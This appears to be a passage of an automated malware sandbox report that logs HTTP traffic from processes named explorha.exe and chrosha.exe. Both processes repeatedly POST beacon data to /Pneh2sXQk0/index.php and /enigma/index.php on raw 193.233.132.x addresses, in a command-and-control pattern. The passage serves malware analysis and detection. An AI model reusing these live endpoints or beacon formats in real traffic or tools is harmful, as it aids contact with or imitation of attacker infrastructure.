                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:59.947263956 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:59 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      224192.168.2.550065193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:59.687695026 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:59.941808939 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:59 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      225192.168.2.550066193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:00.300474882 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:00.545855999 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:00 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:00.547195911 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:00.802133083 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:00 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      226192.168.2.550067193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:00.307631969 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:00.557837009 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:00 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      227192.168.2.550068193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:00.804778099 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:01.053189993 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:00 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      228192.168.2.550069193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:01.157346964 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:01.400033951 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:01 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:01.400871038 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:01.647692919 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:01 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      229192.168.2.550070193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:01.410794973 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:01.653279066 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:01 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      230192.168.2.550071193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:01.903209925 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:02.154031038 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:02 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      231192.168.2.550072193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:02.002891064 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:02.247278929 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:02 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:02.248308897 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:02.501039028 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:02 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      232192.168.2.550073193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:02.504271984 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:02.747591019 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:02 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      233192.168.2.550074193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:02.865746975 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:03.111253023 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:02 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:03.118171930 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:03.368606091 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:03 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      234192.168.2.550075193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:02.998181105 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:03.250096083 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:03 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      235192.168.2.550076193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:03.615123034 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:03.858124971 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:03 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      236192.168.2.550077193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:03.728660107 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
